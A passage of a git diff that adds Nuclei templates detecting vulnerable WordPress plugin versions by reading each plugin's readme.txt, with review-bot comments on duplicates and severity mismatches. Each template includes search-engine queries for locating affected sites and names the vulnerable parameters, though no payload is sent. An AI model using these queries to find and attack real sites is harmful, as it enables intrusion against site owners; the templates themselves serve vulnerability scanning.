"{{BaseURL}}/wp-content/plugins/multi-gallery/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "multi-gallery" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11904.yaml b/poc/cve/CVE-2024-11904.yaml new file mode 100644 index 0000000000..1bf3f48b8c --- /dev/null +++ b/poc/cve/CVE-2024-11904.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11904 + +info: + name: > + 코드엠샵 소셜톡 <= 1.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The 코드엠샵 소셜톡 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'msntt_add_plus_talk' shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e501b31-a7f4-4d0d-bf83-af7b6c023a6b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11904 + metadata: + fofa-query: "wp-content/plugins/mshop-naver-talktalk/" + google-query: inurl:"/wp-content/plugins/mshop-naver-talktalk/" + shodan-query: 'vuln:CVE-2024-11904' + tags: cve,wordpress,wp-plugin,mshop-naver-talktalk,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mshop-naver-talktalk/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mshop-naver-talktalk" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11943.yaml b/poc/cve/CVE-2024-11943.yaml new file mode 100644 index 0000000000..17337631a7 --- /dev/null +++ b/poc/cve/CVE-2024-11943.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11943 + +info: + name: > + 워드프레스 결제 심플페이 – 우커머스 결제 플러그인 <= 5.2.2 - Reflected Cross-Site Scripting via add_query_arg Parameter + author: topscoder + severity: medium + description: > + The 워드프레스 결제 심플페이 – 우커머스 결제 플러그인 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.2.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3d85d609-781b-4f82-af57-124767f9d333?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11943 + metadata: + fofa-query: "wp-content/plugins/pgall-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/pgall-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-11943' + tags: cve,wordpress,wp-plugin,pgall-for-woocommerce,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/pgall-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "pgall-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12026.yaml b/poc/cve/CVE-2024-12026.yaml new file mode 100644 index 0000000000..8f75c79368 --- /dev/null +++ b/poc/cve/CVE-2024-12026.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-12026 + +info: + name: > + Message Filter for Contact Form 7 <= 1.6.3 - Missing Authorization to Authenticated (Subscriber+) New Filter Creation + author: topscoder + severity: low + description: > + The Message Filter for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the saveFilter() function in all versions up to, and including, 1.6.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create new filters. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7e7044aa-a1e7-4b1d-9f50-5e250426c6b0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-12026 + metadata: + fofa-query: "wp-content/plugins/cf7-message-filter/" + google-query: inurl:"/wp-content/plugins/cf7-message-filter/" + shodan-query: 'vuln:CVE-2024-12026' + tags: cve,wordpress,wp-plugin,cf7-message-filter,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cf7-message-filter/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cf7-message-filter" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12115.yaml b/poc/cve/CVE-2024-12115.yaml new file mode 100644 index 0000000000..c7683d9676 --- /dev/null +++ b/poc/cve/CVE-2024-12115.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-12115 + +info: + name: > + Poll Maker <= 5.5.4 - Cross-Site Request Forgery to Poll Duplication + author: topscoder + severity: medium + description: > + The Poll Maker – Versus Polls, Anonymous Polls, Image Polls plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.5.4. This is due to missing or incorrect nonce validation on the duplicate_poll() function. This makes it possible for unauthenticated attackers to duplicate polls via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e76447ec-2815-4758-ae2c-67a938a739d9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-12115 + metadata: + fofa-query: "wp-content/plugins/poll-maker/" + google-query: inurl:"/wp-content/plugins/poll-maker/" + shodan-query: 'vuln:CVE-2024-12115' + tags: cve,wordpress,wp-plugin,poll-maker,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/poll-maker/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "poll-maker" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.5.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12128.yaml b/poc/cve/CVE-2024-12128.yaml new file mode 100644 index 0000000000..dd79fd402c --- /dev/null +++ b/poc/cve/CVE-2024-12128.yaml 
@@ -0,0 +1,59 @@
+id: CVE-2024-12128
+
+info:
+ name: >
+ Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal <= 3.1.2 - Reflected Cross-Site Scripting via monthly_sales_current_year Parameter
+ author: topscoder
+ severity: medium
+ description: >
+ The Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘monthly_sales_current_year’ parameter in all versions up to, and including, 3.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c7d688af-649c-4858-9c63-b12933d78bc2?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-12128
+ metadata:
+ fofa-query: "wp-content/plugins/simple-e-commerce-shopping-cart/"
+ google-query: inurl:"/wp-content/plugins/simple-e-commerce-shopping-cart/"
+ shodan-query: 'vuln:CVE-2024-12128'
+ tags: cve,wordpress,wp-plugin,simple-e-commerce-shopping-cart,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simple-e-commerce-shopping-cart/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "simple-e-commerce-shopping-cart"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1.2')
\ No newline at end of file
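Review bot: This template and CVE-2024-12253 (later in this commit) fingerprint the same plugin directory `simple-e-commerce-shopping-cart` with the same readme request, the same `Stable tag` regex and the same `<= 3.1.2` ceiling, so every affected host is reported twice on identical evidence. Either fold the two into one template that lists both ids in `reference` (and in `cve-id`, which nuclei accepts as a list), or keep them separate but make each `name` say it is a version-range check. Nothing in the hunk sends the `monthly_sales_current_year` parameter named in `description`, so the reflected XSS itself is never exercised; a consumer reading `severity: medium` should not take a match for a confirmed finding.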
diff --git a/poc/cve/CVE-2024-12165.yaml b/poc/cve/CVE-2024-12165.yaml
new file mode 100644
index 0000000000..4cfac374b3
--- /dev/null
+++ b/poc/cve/CVE-2024-12165.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12165
+
+info:
+ name: >
+ Mollie for Contact Form 7 <= 5.0.0 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Mollie for Contact Form 7 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 5.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a5a21b3a-a60f-4083-a474-ec9fedd9b8cb?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-12165
+ metadata:
+ fofa-query: "wp-content/plugins/cf7-mollie/"
+ google-query: inurl:"/wp-content/plugins/cf7-mollie/"
+ shodan-query: 'vuln:CVE-2024-12165'
+ tags: cve,wordpress,wp-plugin,cf7-mollie,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cf7-mollie/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cf7-mollie"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.0.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12166.yaml b/poc/cve/CVE-2024-12166.yaml
new file mode 100644
index 0000000000..7aefefe9e4
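Review bot: `shodan-query: 'vuln:CVE-2024-12165'` is unlikely to ever return a host: Shodan's `vuln:` facet comes from Shodan's own banner-based CVE mapping and is gated to paid plans, and a plugin flaw that is only identifiable from a `readme.txt` is not something Shodan fingerprints. The `fofa-query` and `google-query` on the neighbouring lines are the useful pivots; either drop the Shodan line or replace it with a content filter such as `http.html:"/wp-content/plugins/cf7-mollie/"`. As with the other templates in this commit, the check is a readme version comparison against `<= 5.0.0` and the `page` parameter XSS is never requested, which `description` should state.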
--- /dev/null
+++ b/poc/cve/CVE-2024-12166.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12166
+
+info:
+ name: >
+ Shortcodes Blocks Creator Ultimate <= 2.2.0 - Reflected Cross-Site Scripting via 'page'
+ author: topscoder
+ severity: medium
+ description: >
+ The Shortcodes Blocks Creator Ultimate plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6ece9b6d-6802-44b9-9ead-1563286f4ff3?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-12166
+ metadata:
+ fofa-query: "wp-content/plugins/ultimate-shortcodes-creator/"
+ google-query: inurl:"/wp-content/plugins/ultimate-shortcodes-creator/"
+ shodan-query: 'vuln:CVE-2024-12166'
+ tags: cve,wordpress,wp-plugin,ultimate-shortcodes-creator,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ultimate-shortcodes-creator/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ultimate-shortcodes-creator"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12167.yaml b/poc/cve/CVE-2024-12167.yaml
new file mode 100644
index 0000000000..ec79badc40
--- /dev/null
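Review bot: CVE-2024-12166 and CVE-2024-12167 (next hunk) are identical apart from `id`, `name`, `description` and the Wordfence URL — same `ultimate-shortcodes-creator` readme request, same `Stable tag` regex, same `<= 2.2.0` ceiling — so one vulnerable host yields two findings from a single piece of evidence. A single template listing both ids in `reference` (and in `cve-id`, which nuclei accepts as a list) would halve the noise with no loss of coverage. If they stay separate, at least note in each `description` that the `page` / `_wpnonce` parameters are not exercised and the match is version-based.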
+++ b/poc/cve/CVE-2024-12167.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12167
+
+info:
+ name: >
+ Shortcodes Blocks Creator Ultimate <= 2.2.0 - Reflected Cross-Site Scripting via _wpnonce
+ author: topscoder
+ severity: medium
+ description: >
+ The Shortcodes Blocks Creator Ultimate plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the '_wpnonce' parameter in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/db6ccadb-5e90-4234-88cc-28241846acea?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-12167
+ metadata:
+ fofa-query: "wp-content/plugins/ultimate-shortcodes-creator/"
+ google-query: inurl:"/wp-content/plugins/ultimate-shortcodes-creator/"
+ shodan-query: 'vuln:CVE-2024-12167'
+ tags: cve,wordpress,wp-plugin,ultimate-shortcodes-creator,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ultimate-shortcodes-creator/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ultimate-shortcodes-creator"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.0')
\ No newline at end of file
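Review bot: The `extractors` block defines `version` twice with the same regex, `part` and `group`, the two copies differing only in `internal: true`; the regex therefore runs twice per response for no gain. Nuclei stores the value of any named extractor as a dynamic variable usable in DSL matchers — `internal` only suppresses printing it — so the `compare_versions(version, ...)` matcher works off the non-internal copy alone. Keep one extractor: drop the `internal: true` block if the version should appear in output, or drop the second block if it should not.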
diff --git a/poc/cve/CVE-2024-12209-6ec7c164fe320907f155f71f239635b3.yaml b/poc/cve/CVE-2024-12209-6ec7c164fe320907f155f71f239635b3.yaml
new file mode 100644
index 0000000000..f2308a585c
--- /dev/null
+++ b/poc/cve/CVE-2024-12209-6ec7c164fe320907f155f71f239635b3.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12209-6ec7c164fe320907f155f71f239635b3
+
+info:
+ name: >
+ WP Umbrella: Update Backup Restore & Monitoring <= 2.17.0 - Unauthenticated Local File Inclusion
+ author: topscoder
+ severity: critical
+ description: >
+ The WP Umbrella: Update Backup Restore & Monitoring plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.17.0 via the 'filename' parameter of the 'umbrella-restore' action. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c74ce3e8-cab9-4cc6-a1ad-1e51f7268474?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-12209
+ metadata:
+ fofa-query: "wp-content/plugins/wp-health/"
+ google-query: inurl:"/wp-content/plugins/wp-health/"
+ shodan-query: 'vuln:CVE-2024-12209'
+ tags: cve,wordpress,wp-plugin,wp-health,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-health/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-health"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.17.0')
\ No newline at end of file
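Review bot: For a 9.8 unauthenticated LFI the `word` matcher is the weak link: it requires the literal directory slug `wp-health` in the readme body, yet the plugin presents itself as "WP Umbrella" in `name`, and if its readme.txt does not happen to spell out `wp-health` (it would only do so inside a URL or tag line) the `and` condition fails and the host is silently not reported. Matching the readme title line (`=== <plugin name> ===`) with `case-insensitive: true`, or dropping the word matcher since the 200 status plus a `Stable tag` hit on `/wp-content/plugins/wp-health/readme.txt` already ties the response to this plugin directory, is more robust. The `umbrella-restore` action and `filename` parameter from `description` are never sent, so a match is a version-range result, not a confirmed LFI — given the critical rating, please state that in `name` or `description`.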
diff --git a/poc/cve/CVE-2024-12253.yaml b/poc/cve/CVE-2024-12253.yaml
new file mode 100644
index 0000000000..ac168ac90f
--- /dev/null
+++ b/poc/cve/CVE-2024-12253.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12253
+
+info:
+ name: >
+ Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal <= 3.1.2 - Missing Authorization to Authenticated (Subscriber+) Settings Update / Data Access
+ author: topscoder
+ severity: low
+ description: >
+ The Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the 'save_settings', 'export_csv', and 'simpleecommcart-action' actions in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to update the plugins settings and retrieve order and log data (which is also accessible to unauthenticated users).
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1c6a1956-73aa-4ac3-ae1c-ef5f62bad718?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2024-12253
+ metadata:
+ fofa-query: "wp-content/plugins/simple-e-commerce-shopping-cart/"
+ google-query: inurl:"/wp-content/plugins/simple-e-commerce-shopping-cart/"
+ shodan-query: 'vuln:CVE-2024-12253'
+ tags: cve,wordpress,wp-plugin,simple-e-commerce-shopping-cart,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simple-e-commerce-shopping-cart/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "simple-e-commerce-shopping-cart"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1.2')
\ No newline at end of file
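Review bot: `severity: low` and the trailing `low` in `tags` disagree with `cvss-score: 5.4` (vector `PR:L/UI:N/S:U/C:L/I:L/A:N`), which is the CVSS v3.1 Medium band; change both to `medium`. The `description` also says the order and log data is "also accessible to unauthenticated users", which does not fit a `PR:L` vector — worth checking the Wordfence entry and aligning one or the other. The detection itself duplicates CVE-2024-12128 from this same commit (same plugin slug, same readme request, same `<= 3.1.2` ceiling), so each affected host receives two identical findings.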
diff --git a/poc/cve/CVE-2024-12257.yaml b/poc/cve/CVE-2024-12257.yaml
new file mode 100644
index 0000000000..91db656093
--- /dev/null
+++ b/poc/cve/CVE-2024-12257.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12257
+
+info:
+ name: >
+ CardGate Payments for WooCommerce <= 3.2.1 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The CardGate Payments for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9f8de5a9-2279-4b84-b1f6-fdb293aa6017?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-12257
+ metadata:
+ fofa-query: "wp-content/plugins/cardgate/"
+ google-query: inurl:"/wp-content/plugins/cardgate/"
+ shodan-query: 'vuln:CVE-2024-12257'
+ tags: cve,wordpress,wp-plugin,cardgate,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cardgate/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cardgate"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.2.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12270.yaml b/poc/cve/CVE-2024-12270.yaml
new file mode 100644
index 0000000000..e716d09498
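Review bot: The `word` matcher `- "cardgate"` is case-sensitive by default, while the plugin spells itself `CardGate` in `name`; if the readme.txt only uses the capitalised form (and no lowercase URL or tag containing `cardgate`), the `and` condition fails and a vulnerable install is not reported. Add `case-insensitive: true` to that matcher, or match a phrase that is certain to be in the readme such as its `=== … ===` title line. The match remains a `Stable tag <= 3.2.1` comparison; the `page` parameter from `description` is never sent, which is worth noting in the template text.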
--- /dev/null
+++ b/poc/cve/CVE-2024-12270.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12270
+
+info:
+ name: >
+ Beautiful Taxonomy Filters <= 2.4.3 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
+ The Beautiful taxonomy filters plugin for WordPress is vulnerable to SQL Injection via the 'selects[0][term]' parameter in all versions up to, and including, 2.4.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/75c9c106-d1f9-43ee-be1f-3eddec8f2529?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2024-12270
+ metadata:
+ fofa-query: "wp-content/plugins/beautiful-taxonomy-filters/"
+ google-query: inurl:"/wp-content/plugins/beautiful-taxonomy-filters/"
+ shodan-query: 'vuln:CVE-2024-12270'
+ tags: cve,wordpress,wp-plugin,beautiful-taxonomy-filters,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/beautiful-taxonomy-filters/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "beautiful-taxonomy-filters"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7894.yaml b/poc/cve/CVE-2024-7894.yaml
new file mode 100644
index 0000000000..15d2afcc62
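Review bot: `severity: critical` (and the trailing `critical` tag) does not match `cvss-score: 7.5` with vector `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`, which is the CVSS v3.1 High band (7.0–8.9); set `severity: high` and `...,high`, or correct the score if the Wordfence entry rates it higher. An unauthenticated SQLi with a named parameter (`selects[0][term]`) is the kind of issue a template could confirm with a non-destructive probe, but this hunk never sends it — a finding is a readme `Stable tag` comparison against `<= 2.4.3`, and `name`/`description` should say so. `poc/other/beautiful-taxonomy-filters.yaml` in the same commit carries the identical check with empty classification fields, so hosts will be reported twice.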
--- /dev/null
+++ b/poc/cve/CVE-2024-7894.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7894
+
+info:
+ name: >
+ If Menu <= 0.19.1 - Missing Authorization to License Key Update
+ author: topscoder
+ severity: high
+ description: >
+ The If Menu plugin for WordPress is vulnerable to unauthorized modification of the plugin's license key due to a missing capability check on the 'actions' function in versions up to, and including, 0.19.1. This makes it possible for unauthenticated attackers to modify delete or modify the license key.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ff6ebf45-4617-44dd-94d8-28aa8bc1609b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-7894
+ metadata:
+ fofa-query: "wp-content/plugins/if-menu/"
+ google-query: inurl:"/wp-content/plugins/if-menu/"
+ shodan-query: 'vuln:CVE-2024-7894'
+ tags: cve,wordpress,wp-plugin,if-menu,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/if-menu/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
